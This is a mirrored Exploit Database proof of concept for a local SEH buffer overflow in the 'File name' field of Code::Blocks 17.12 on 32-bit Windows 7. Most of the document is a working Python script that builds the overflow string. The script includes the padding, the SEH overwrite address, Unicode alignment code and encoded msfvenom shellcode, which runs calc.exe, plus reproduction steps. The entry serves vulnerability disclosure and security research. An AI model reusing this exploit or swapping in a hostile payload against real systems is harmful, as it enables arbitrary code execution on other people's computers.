Code Blocks 17.12 – ‘File Name’ Local Buffer Overflow (Unicode) (SEH) (PoC)

• Exploit Database
• 16 阅读

• 作者： Paras Bhatia
  日期： 2020-06-17
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/48594/

• # Exploit Title: Code Blocks 17.12 - 'File Name' Local Buffer Overflow (Unicode) (SEH) (PoC) 
  # Vendor Homepage: http://www.codeblocks.org/ 
  # Software Link Download: https://sourceforge.net/projects/codeblocks/files/Binaries/17.12/Windows/codeblocks-17.12-setup.exe/download
  # Exploit Author: Paras Bhatia
  # Discovery Date: 2020-06-16
  # Vulnerable Software: Code Blocks
  # Version: 17.12
  # Vulnerability Type: Local Buffer Overflow
  # Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)
  
  #Steps to Produce the Crash:
  
  # 1.- Run python code: codeblocks.py
  # 2.- Copy content to clipboard
  # 3.- Turn off DEP for codeblocks.exe
  # 4.- Open "codeblocks.exe"
  # 5.- Go to "File" > "New" > "Project..."
  # 6.- Click on "Files" from left box > Select "C/C++ header" > Clickon "Go" > Click on "Next"
  # 7.- Paste ClipBoard into the "Filename with fullpath:" .
  # 8.- Click on "Finish".
  # 9.- Calc.exe runs.
  
  
  #################################################################################################################################################
  
  #Python "codeblocks.py" Code:
  
  f= open("codeblocks.txt", "w")
  
  junk1="A" * 2006
  
  
  nseh="\x61\x62" #popad / align
  
  
  #Found pop edi - pop ebp - ret at 0x005000E0 [codeblocks.exe] ** Unicode compatible **** Null byte ** [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **]- C:\Program Files\CodeBlocks\codeblocks.exe
  seh="\xe0\x50" 
  
  ven = "\x62"#align
  ven +="\x53"#push ebx
  ven += "\x62" #align
  ven += "\x58" #pop eax
  ven += "\x62" #align
  ven += "\x05\x14\x11" #add eax, 0x11001400
  ven += "\x62" #align
  ven += "\x2d\x13\x11" #sub eax, 0x11001300
  ven += "\x62" #align
  
  ven += "\x50" #push eax
  ven += "\x62" #align
  ven += "\xc3" #ret
  
  junk2="\x41" * 108#required to make sure shellcode = eax
  
  #msfvenom -p windows/exec cmd=calc.exe --platform windows -f py -e x86/unicode_mixed BufferRegister=EAX
  buf =""
  buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
  buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
  buf += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
  buf += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
  buf += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
  buf += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
  buf += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
  buf += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
  buf += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
  buf += "\x47\x42\x39\x75\x34\x4a\x42\x59\x6c\x48\x68\x71\x72"
  buf += "\x69\x70\x4b\x50\x49\x70\x73\x30\x53\x59\x69\x55\x50"
  buf += "\x31\x49\x30\x33\x34\x62\x6b\x62\x30\x50\x30\x74\x4b"
  buf += "\x42\x32\x6a\x6c\x62\x6b\x30\x52\x6d\x44\x74\x4b\x52"
  buf += "\x52\x6c\x68\x5a\x6f\x34\x77\x6f\x5a\x4e\x46\x50\x31"
  buf += "\x6b\x4f\x74\x6c\x4f\x4c\x6f\x71\x31\x6c\x6d\x32\x4c"
  buf += "\x6c\x6f\x30\x56\x61\x66\x6f\x6a\x6d\x4b\x51\x69\x37"
  buf += "\x67\x72\x48\x72\x42\x32\x6f\x67\x72\x6b\x52\x32\x5a"
  buf += "\x70\x72\x6b\x70\x4a\x4d\x6c\x32\x6b\x6e\x6c\x5a\x71"
  buf += "\x64\x38\x7a\x43\x31\x38\x4b\x51\x36\x71\x42\x31\x34"
  buf += "\x4b\x30\x59\x4b\x70\x39\x71\x79\x43\x62\x6b\x6d\x79"
  buf += "\x6b\x68\x6a\x43\x6c\x7a\x70\x49\x62\x6b\x50\x34\x52"
  buf += "\x6b\x59\x71\x69\x46\x4c\x71\x79\x6f\x34\x6c\x65\x71"
  buf += "\x46\x6f\x4c\x4d\x7a\x61\x76\x67\x70\x38\x6b\x30\x30"
  buf += "\x75\x6c\x36\x79\x73\x63\x4d\x49\x68\x6d\x6b\x31\x6d"
  buf += "\x6f\x34\x63\x45\x67\x74\x6e\x78\x54\x4b\x72\x38\x6c"
  buf += "\x64\x4b\x51\x77\x63\x71\x56\x74\x4b\x6a\x6c\x6e\x6b"
  buf += "\x64\x4b\x32\x38\x4b\x6c\x6a\x61\x38\x53\x74\x4b\x6b"
  buf += "\x54\x34\x4b\x4a\x61\x68\x50\x44\x49\x4e\x64\x6f\x34"
  buf += "\x4c\x64\x51\x4b\x4f\x6b\x53\x31\x6e\x79\x71\x4a\x32"
  buf += "\x31\x79\x6f\x69\x50\x4f\x6f\x4f\x6f\x4f\x6a\x64\x4b"
  buf += "\x6e\x32\x58\x6b\x54\x4d\x6f\x6d\x30\x6a\x4b\x51\x64"
  buf += "\x4d\x45\x35\x55\x62\x49\x70\x4d\x30\x4d\x30\x72\x30"
  buf += "\x73\x38\x4d\x61\x52\x6b\x72\x4f\x54\x47\x79\x6f\x66"
  buf += "\x75\x75\x6b\x68\x70\x35\x65\x45\x52\x6f\x66\x4f\x78"
  buf += "\x73\x76\x56\x35\x75\x6d\x35\x4d\x79\x6f\x69\x45\x4d"
  buf += "\x6c\x79\x76\x43\x4c\x6b\x5a\x45\x30\x59\x6b\x57\x70"
  buf += "\x34\x35\x49\x75\x57\x4b\x6e\x67\x4e\x33\x32\x52\x52"
  buf += "\x4f\x71\x5a\x49\x70\x51\x43\x6b\x4f\x69\x45\x62\x43"
  buf += "\x43\x31\x52\x4c\x33\x33\x4e\x4e\x31\x55\x31\x68\x53"
  buf += "\x35\x6d\x30\x41\x41"
  
  
  
  
  junk3 = "\x62" * 5000#padding to crash
  
  
  
  payload = junk1 + nseh + seh + ven + junk2 + buf +junk3
  
  f.write(payload)
  f.close